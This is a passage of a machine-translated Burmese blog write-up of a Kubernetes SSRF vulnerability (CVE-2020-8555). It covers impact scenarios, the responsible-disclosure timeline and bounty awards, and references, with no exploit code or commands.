တိုက်ခိုက်မှု vector များနှင့် ဆက်စပ်သော exploit scenarios အားလုံးကို on သမာဓိ၊ အဖျက်လုပ်ရပ်များအတွက် အသုံးပြုနိုင်ပြီး ကလိုင်းယင့် ပတ်၀န်းကျင် (သို့မဟုတ် အခြားမည်သည့်အရာမဆို) မရရှိနိုင်သည့် မာစတာဖြစ်ရပ်များဆီသို့ ဦးတည်သွားနိုင်သည်။

ကျွန်ုပ်တို့သည် စီမံခန့်ခွဲထားသော K8s ပတ်ဝန်းကျင်တွင်ရှိ၍ သမာဓိအပေါ် အကျိုးသက်ရောက်မှုကို အကဲဖြတ်ခြင်းဖြစ်သောကြောင့်၊ ရရှိနိုင်မှုအပေါ် သက်ရောက်မှုရှိနိုင်သော မြင်ကွင်းများစွာကို ကျွန်ုပ်တို့ စိတ်ကူးကြည့်နိုင်ပါသည်။ နောက်ထပ်ဥပမာများတွင် etcd ဒေတာဘေ့စ်ကို ပျက်စီးစေခြင်း သို့မဟုတ် Kubernetes API သို့ အရေးကြီးသောခေါ်ဆိုမှုတစ်ခု ပြုလုပ်ခြင်းတို့ ပါဝင်သည်။

သက်ကရာဇျစဉျ

• ဒီဇင်ဘာ 6၊ 2019- အားနည်းချက်သည် MSRC Bug Bounty သို့ တိုင်ကြားခဲ့သည်။
• ဇန်နဝါရီ 3၊ 2020- ကျွန်ုပ်တို့သည် လုံခြုံရေးပြဿနာကို လုပ်ဆောင်နေကြောင်း ပြင်ပအဖွဲ့အစည်းမှ Kubernetes developer များအား အသိပေးခဲ့သည်။ SSRF အား အတွင်းပိုင်း (in-core) အားနည်းချက်အဖြစ် ထည့်သွင်းစဉ်းစားရန် ၎င်းတို့အား တောင်းဆိုခဲ့သည်။ ထို့နောက် ကျွန်ုပ်တို့သည် ပြဿနာ၏အရင်းအမြစ်နှင့်ပတ်သက်သည့် နည်းပညာဆိုင်ရာအသေးစိတ်အချက်အလက်များနှင့်အတူ အထွေထွေအစီရင်ခံစာကို ပေးခဲ့ပါသည်။
• ဇန်နဝါရီ 15 ရက်၊ 2020- ကျွန်ုပ်တို့သည် ၎င်းတို့၏တောင်းဆိုမှုအရ Kubernetes developer များအား နည်းပညာပိုင်းဆိုင်ရာနှင့် အထွေထွေအစီရင်ခံစာများ (HackerOne ပလပ်ဖောင်းမှတဆင့်) ပေးထားပါသည်။
• ဇန်နဝါရီ 15၊ 2020- လွန်ခဲ့သည့်ထုတ်ဝေမှုများအတွက် တစ်ဝက်ကန်းသော SSRF + CRLF ထိုးခြင်းကို Kubernetes ဆော့ဖ်ဝဲအင်ဂျင်နီယာများက ကျွန်ုပ်တို့အား အသိပေးခဲ့သည်။ ကျွန်ုပ်တို့သည် အခြားဝန်ဆောင်မှုပေးသူများ၏ ပတ်၀န်းကျင်များကို ခွဲခြမ်းစိတ်ဖြာခြင်းအား ချက်ချင်းရပ်တန့်လိုက်သည်- K8s အဖွဲ့သည် ယခုအခါ မူလအကြောင်းအရင်းကို ဖြေရှင်းနေပါသည်။
• ဇန်နဝါရီ 15 ရက်၊ 2020- HackerOne မှရရှိသော MSRC ဆုလာဘ်။
• ဇန်နဝါရီ 16၊ 2020- Kubernetes PSC (ထုတ်ကုန်လုံခြုံရေးကော်မတီ) သည် အားနည်းချက်ကို အသိအမှတ်ပြုခဲ့ပြီး ဖြစ်နိုင်ချေရှိသော သားကောင်အရေအတွက်များသောကြောင့် မတ်လလယ်အထိ လျှို့ဝှက်ထားရန် တောင်းဆိုခဲ့သည်။
• ဖေဖော်ဝါရီ 11 ရက်၊ 2020- Google VRP ဆုလာဘ်ကို ရရှိခဲ့သည်။
• မတ်လ 4 ရက်၊ 2020- HackerOne မှရရှိသော Kubernetes ဆုလာဘ်။
• မတ်လ 15 ရက်၊ 2020- COVID-19 အခြေအနေကြောင့် မူလစီစဉ်ထားသည့် အများသူငှာထုတ်ဖော်မှုကို ရွှေ့ဆိုင်းထားသည်။
• ဇွန်လ 1 ရက်၊ 2020- အားနည်းချက်အကြောင်း Kubernetes + Microsoft ပူးတွဲထုတ်ပြန်ချက်။

TL; DR

• ဘီယာသောက်ပြီး ပီဇာစားတယ် :)
• ကျွန်ုပ်တို့သည် ထိုသို့လုပ်ဆောင်ရန် ရည်ရွယ်ချက်မရှိသော်လည်း Kubernetes တွင် အခြေခံအားနည်းချက်တစ်ခုကို တွေ့ရှိခဲ့သည်။
• ကျွန်ုပ်တို့သည် မတူညီသော cloud ဝန်ဆောင်မှုပေးသူများ၏ အစုအဝေးများအပေါ် ထပ်လောင်းခွဲခြမ်းစိတ်ဖြာမှုများ ပြုလုပ်ခဲ့ပြီး အပိုဆောင်းထူးချွန်ဆုကြေးငွေများရရှိရန် အားနည်းချက်ကြောင့် ပျက်စီးဆုံးရှုံးမှုများကို တိုးမြှင့်နိုင်ခဲ့သည်။
• ဤဆောင်းပါးတွင် နည်းပညာဆိုင်ရာ အသေးစိတ်အချက်များစွာကို သင်တွေ့လိမ့်မည်။ သူတို့နဲ့ ဆွေးနွေးရတာ ဝမ်းသာပါတယ် (Twitter- @ReeverZax & @__hach_).
• နည်းလမ်းမျိုးစုံနဲ့ အစီရင်ခံမှုတွေဟာ မျှော်လင့်ထားတာထက် အများကြီး ပိုကြာသွားတာကို တွေ့ရတယ်။

ကိုးကား

• Google အဖွဲ့ kubernetes-security-nounce;
• CVE-2020-8555;
• Golang စာစောင် အမှတ် ၃၀၇၉၄;
• heketi/client/api/go-client/volume.go.

PS ဘာသာပြန်မှ

ကျွန်ုပ်တို့၏ဘလော့ဂ်တွင်လည်းဖတ်ပါ

• «Kubernetes bug ရှာဖွေမှုကို တရားဝင်ဖွင့်ထားသည်။";
• «မှတ်တမ်းများကို တပ်ဆင်ခြင်းဖြင့် Kubernetes တွင် pod တစ်ခုမှ ထွက်ခြင်း။";
• «33+ Kubernetes လုံခြုံရေးကိရိယာများ"။

source: www.habr.com